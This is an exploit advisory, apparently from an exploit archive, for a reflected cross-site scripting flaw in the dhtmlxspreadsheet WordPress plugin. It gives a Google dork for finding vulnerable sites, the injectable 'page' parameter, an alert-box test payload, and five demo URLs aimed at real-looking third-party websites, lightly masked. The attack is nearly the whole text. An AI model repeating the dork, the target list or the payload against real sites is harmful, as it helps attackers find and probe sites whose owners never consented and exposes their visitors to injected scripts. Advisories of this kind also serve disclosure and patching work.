#******************************************************************************** # Exploit Title : Wordpress spreadsheet Plugin Cross site scripting # # Exploit Author : Ashiyane Digital Security Team # # Vendor Homepage : http://wordpress.org # # Software Link : http://downloads.wordpress.org/plugin/dhtmlxspreadsheet.2.0.zip # # Google Dork : inurl :wp-content/plugins/dhtmlxspreadsheet # # Date: 2013/10/18 # # Tested on: Windows 7 , Linux ------------------------------------------------------------------- # Exploit : Cross site scripting # # Location : [Target]/wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=[xss] # # Script For Test : <script>alert(1);</script> ###################### # Demo: # # http://www.artsXben.com/wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=<script>alert(1);</script> # # http://www.chesXerbowl.org/wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=<script>alert(1);</script> # # http://www.homXkamerica.com/wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=<script>alert(1);</script> # # http://www.meXda.org/wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=<script>alert(1);</script> # # http://www.womeninediXscovery.org/wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=<script>alert(1);</script> # ###################### discovered by : ACC3SS ######################